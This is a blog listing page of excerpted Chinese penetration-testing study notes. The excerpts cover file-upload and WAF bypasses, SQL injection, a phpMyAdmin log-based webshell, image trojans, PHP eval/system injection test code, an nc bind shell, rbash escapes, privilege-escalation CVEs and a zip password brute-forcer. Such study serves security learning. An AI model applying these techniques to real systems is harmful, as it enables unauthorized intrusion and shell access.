自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(65)
  • 收藏
  • 关注

原创 [小迪安全20-23天]upload-laps

upload-lab1.前端验证1.禁用本地js火狐禁用jsF12->设置->禁用javascriptIE禁用jshttps://jingyan.baidu.com/article/2a138328b1f0ee074a134f90.html2. burpsuite抓包改包3. 谷歌覆盖拷贝页面源码通过本地新建html文件把源码拷贝进去把js代码删除并修改或添加action把action修改为页面上传文件的后端代码文件成功上传执行成功2

2021-05-16 22:22:59 359

原创 [小迪安全18-19天]sql waf 绕过

盲注过滤逗号当过滤逗号时代替sleep函数benchmark用于测试速度第一个参数表示执行第二个参数多少次,如上2.5秒测完代替ascii函数 hex,bin替换group_concatconcat_ws()

2021-05-15 22:09:37 233 2

原创 docekr

docker镜像命令运行镜像 docker run ID搜索镜像 docker search mysql过滤搜查 docker search mysql --filter-STARS=3000拉镜像 docker pull mysql[:版本号] #默认最新删除镜像 docker rmi -f ID全删 docker rmi -f $(docker image -aq)容器命令docker pull centos交互式运行 docker run -it centos /bin/ba

2021-05-14 21:48:08 168

原创 php4

创建图像imagecreatetruecolor函数创建图像模型imagecolorallocate 创建颜色为RGB类型imagefill 填充图片imagejpeg 保存图片imagedestroy 销毁图片<?phpheader('Content-type:image/jpegs');//默认情况header('Content-type:text/html');$img=imagecreatetruecolor(200,200);//新建一个长和高都为200像素的真彩色图

2021-05-13 23:34:32 202

原创 [小迪安全13-17天]sql注入

注入手法Cookie注入sqli-labs-master/Less-20/为例正常提交是无法进行注入的,可以通过cookie注入GET方式注入就如正常注入一样先判断字符型还是数字型,有无回显,有无报错等HTTP头部注入sqli-labs-master/Less-18/为例可以看到有user-agent回显说明有可能与http头部信息有联系...

2021-05-12 22:57:03 288

原创 Python信息取证

使用python对mac地址取证from winreg import *import redef vlal2addr(val): addr = "" i = 1 for ch in val: ret = re.match(r"^0x(\w*)",hex(ch)) addr += ret.group(1) if i < 6: addr += ":" i +=1 return addrdef printNets(): net = r"SOFTW

2021-04-30 22:19:22 279 1

原创 php之路3

正则函数模式修正符imsU与正则表达式配合的函数preg_match_all()preg_match()preg_replace()模式修正符i在和模式进行匹配时不区分大小写<?php /*模式修正符 : i 在和模式进行匹配时不区分大小写*/$pattern='/test/i';$str=' test TEST Test TeSt ';var_dump(preg_match_all($pattern,$str,$arr));var_du

2021-04-30 13:07:40 74

原创 php之路2

正则表达式?匹配0次或1次其前面的字符放在?前面的那个字符可以出现0次,或者1次<?php/*元字符:? 匹配0次或1次其前面的字符 放在?前面的那个字符可以出现0次,或者1次*/$pattern='/te?st/';$str='abcteest';var_dump(preg_match_all($pattern,$str,$arr));var_dump($arr);+匹配1次或多次其前面的字符放在+前面的那个字符可以出现1次,也可以出现多次<?php

2021-04-29 12:53:01 120 1

原创 PHP之路

局部变量与全局变量 1.局部变量 function test(){ $a=1;//局部变量$a,尽在这个函数内部有效 } echo $a; 2.全局变量 $i=10;//全局变量(外部变量) define('MY_NAME','卢克卢'); function test(){ echo MY_NAME; global $i;//声明$i为全局变量,然后再这个函数内部就可以使用$i echo $i; $a=1; } test(); 3.静态变量

2021-04-28 23:08:51 536

原创 爆破zip

使用Python对zip进行爆破import zipfileimport sysfrom threading import Threadimport optparseparse = optparse.OptionParser("useage: python3 file.py -f <target zip> -d <target dic>")parse.add_option("-f","--filename",dest="targetzip",help="jie ya d

2021-04-25 22:11:31 540 1

原创 [小迪安全第12天]mysql注入

mysql注入跨库注入文件读写魔术引号编码绕过防御机制内置函数过滤关键字waf跨库注入数据库中的information_schema:tables表中记录着所有的表:schemata表记录所有数据库名union select 1,2,group_concat(schema_name) from information_schema.schemata获取所有数据库名字获取数据库名为"mysql"的所有表名union select 1,2,group_concat(table_na

2021-04-25 21:02:13 231

原创 日志getshell

phpmyadmin日志getshell设置日志文件上传一句话木马查看是否成功蚁剑或菜刀getshellgetshell成功 在进入别人的phpmyadmin数据库后可以采用日志getshell具体过程如下设置日志文件 设置general_log = ONgeneral_log_file = 网站根目录的php文件上传一句话木马执行sql语句密码为cmd查看是否成功找到上传的地址蚁剑或菜刀getshellgetshell成功最后可使用反弹shel

2021-04-23 20:45:50 405

原创 信息收集

简单测试目标: http://45.33.42.112像这种网站完全没有任何信息可以考虑从第三方入手第三方测试1.各个端口进行测试2.各种接口进行测试3. 接口部分进行测试采用nmap 进行扫描进行扫描测试nmap -A 45.44.42.112 -p 1-65535shadon钟馗之眼...

2021-04-22 13:02:16 276

原创 [小迪安全第8天]waf

如何识别WAFhttps://github.com/enablesecurity/wafw00f识别waf工具http报文识别

2021-04-21 22:56:31 149

原创 [小迪安全第8天]站点搭建分析

信息收集站点搭建分析目录型站点端口类站点子域名站点类似域名站点旁注,C段站点搭建软件特征站点站点搭建分析目录型站点通过访问网站如果目录下的网站差别特别大可能就是采取了不同的设定方案网站里的目录采用不同的程序方案那就有更多的可能来对站点进行测试由上可以看出只是变化了个目录就完全不是一个不同的网站了,而且两个网站的cms不同端口类站点通过对网站IP不同的端口访问得到不同的网站信息如果一个端口遭殃另一个也跟着遭殃,那就有更多的机会来进行安全测试端口不同查询的结果不同子域名站点

2021-04-21 22:40:20 904 1

原创 [小迪安全10天]cdn绕过

信息收集CDN绕过查询有无cdn通过超级ping或站长之家查询域名所对应的IP是否存在多个如果是基本上可判断有CDN查询www.baidu.com存在cdnf’ji

2021-04-21 21:31:01 466

原创 DC3

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档文章目录DC3信息搜集SQL注入破解hash文件上传反弹shell提权DC3信息搜集不用多说把nmap掏出来扫下nmap -sP 192.168.64.0/24nmap -A 192.168.64.133 -p 1-65535下一步扫描网站目录使用御剑或msfuse auxiliary/scanner/http/dir_scannerset RHOSTS 192.168.64.133set THREADS 50

2021-04-18 18:25:38 301

原创 python套接字

udp客户端import socketimport sysdef mian(argv): #创建套接字,类型为ipv4(AF_INET),协议为UDP(SOCK_DGRAM) up_socket = socket.socket(socket.AF_INET,socket.SOCK_DGRAM) while 1: send_data=input("input your speak:") if send_data=="break":

2021-04-17 20:44:45 162

原创 nmap msf sqlmap

namp下载https://nmap.org/download.html 下载安装包./configure &&make&&make install重要参数特殊扫描无Ping扫描nmap -P0 172.21.230.14/24SYN扫描nmap -PS 172.21.230.14/24ICMP扫描-PE, -PP , -PMICMP 回声应答扫描ICMP 时间戳扫描 确定主机是否在线ICMP 地址掩码扫描 可以很好传

2021-04-17 20:42:25 366

原创 图片木马

借鉴别人许多图片木马的合并copy 1.jpg/b+2.php/a 生成的.jpg也可以在图片版权中添加Php脚本语言文件幻术文件幻术png89 50 4E 47 0D 0A 1A 0A 00 00 00 0D 49 48 44 52jpgFF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 01 2cgif47 49 46 38 39 61 F1 00 2C 01 F7 00 00 64 32 33后缀名绕过.php .php2 .php3

2021-04-17 20:35:23 419

原创 php命令注入

eval()<?phpif(isset($_REQUEST['code'])){@$str=$_REQUEST['code'];eval($str);}?><?phpif(isset($_GET['code'])){@$str=$_GET['code'];eval($str);}?>提交变量[?code=phpinfo();]我们提交以下参数也是可以的[?code=${phpinfo()};][?code=1;phpinfo();

2021-04-17 20:33:59 642

原创 os命令注入

system函数system() 能够将字符串作为OS 命令执行,自带输出功能<?phpif(isset($_GET['cmd'])){$str=$_GET['cmd'];system($str);}?>提交参数?cmd=ipconfig**exec()**函数exec() 函数能将字符串作为OS命令执行,需要输出执行结果。测试代码如下<?phpif(isset($_GET['cmd'])){$str=$_GET['cmd'];prin

2021-04-17 20:33:20 190

原创 提权

漏洞补丁编号**对应的漏洞补丁**CVE-2017-0213  [Windows COM Elevation of Privilege Vulnerability]  (windows 10/8.1/7/2016/2010/2008)MS17-010  [KB4013389]  [Windows Kernel Mode Drivers]  (windows 7/2008/2003/XP)MS16-135  [KB3199135]  [Windows Kernel Mode Drivers]  

2021-04-17 20:32:22 319

原创 反弹shell

nc受害主机# 开启本地8080端口监听,并将本地的bash发布出去。nc -lvvp 8080 -t -e /bin/bash攻击主机nc 172.21.230.72 8080 #连接受害主机的bash不支持-e[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-DrtD27Ak-1618662609473)(C:\Users\86184\AppData\Roaming\Typora\typora-user-images\image-2021041717

2021-04-17 20:31:25 152

原创 Rbash绕过

RbashVI绕过vi:set shell=/bin/sh运行shell:shellexport PATH=/usr/sbin:/usr/bin:/sbin:/binCP绕过cp 环境变量绕过BASH_CMDS[a]=/bin/sh;a 注:把/bin/bash给a变量`export PATH=$PATH:/bin/ 注:将/bin 作为PATH环境变量导出export PATH=$PATH:/usr/bin 注:将/usr/bin作为PATH环境变量导

2021-04-17 20:29:34 566

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除